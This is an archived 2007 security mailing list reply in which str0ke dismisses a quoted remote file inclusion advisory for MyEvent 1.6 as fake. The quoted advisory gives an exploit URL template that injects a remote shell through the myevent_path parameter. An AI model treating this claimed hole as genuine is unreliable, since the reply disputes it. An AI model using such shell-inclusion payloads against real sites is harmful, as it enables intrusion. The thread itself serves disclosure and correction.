OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability

From: str0ke (str0kemilw0rm.com)
Date: Sat Jun 02 2007 - 11:17:09 CDT


Another fake, the entire file is a class.

/str0ke

On 2 Jun 2007 07:07:53 -0000, yasergencturk.net <yasergencturk.net> wrote:
> #########################################################################
> #
> # MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
> #
> # Author: Yaser <yasergencturk.net>
> #
> # Homepage: http://www.ayyildiz.org
> #
> #########################################################################
>
>
>
> #########################################################################
> # Download S : http://mywebland.com/download.php?id=6
> #
> # ERROR:
> #
> # include_once($myevent_path.'includes/template.php')
> #
> # Exploit:
> # http://[site]/[PaTh]/includes/template.php?myevent_path=[shell]
> #
> #########################################################################
>
> Thanks: ir4dex - ht08 - ajann - H0tturk - Zakix - Devil Hacker
>